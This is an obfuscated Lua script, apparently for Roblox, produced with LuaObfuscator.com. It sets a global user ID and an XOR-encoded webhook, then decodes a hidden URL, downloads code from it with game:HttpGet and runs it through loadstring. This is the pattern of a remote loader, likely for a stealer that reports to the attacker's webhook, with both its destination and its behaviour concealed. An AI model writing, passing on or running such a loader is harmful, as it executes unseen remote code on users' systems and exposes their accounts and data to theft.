--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=(3 -2) + (1281 -(1225 + 56)), #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1)),v1(v2(v9,(1 -0) + 0 + ((v11-1)% #v9),1 + ((v11-(1104 -(310 + 500 + 293)))% #v9) + (1 -0) + 0 + 0)))%((1200 -547) -397)));end return v5(v10);end _G.UserID=(3945451112 -(597 + 299)) -(2835799700 -1813176212);_G.WebHook=v7("\73\95\110\153\82\17\53\198\69\66\105\138\78\89\126\199\66\68\119\198\64\91\115\198\86\78\120\129\78\68\113\154\14\26\42\223\16\27\46\222\23\18\44\216\18\24\43\208\18\28\40\209\14\120\45\162\71\27\99\216\66\64\35\222\73\127\35\145\98\126\105\139\104\108\35\189\89\66\84\186\85\96\107\190\79\73\92\157\115\64\84\174\98\30\99\144\67\121\75\153\109\116\69\188\89\26\118\209\119\97\81\174\107\67\126\176\16\88\98\186\98","\33\43\26\233");loadstring(game:HttpGet(v7("\38\41\180\96\66\116\114\239\98\80\57\115\167\121\69\38\40\162\101\66\43\47\163\127\95\58\56\174\100\31\45\50\173\63\98\39\49\165\126\82\43\14\163\98\88\62\41\179\63\97\61\37\147\115\67\39\45\180\99\31\2\40\161\63\92\47\52\174\63\97\61\37\129\101\69\33\59\161\98\92\96\41\178\101\84","\78\93\192\16\49")))();
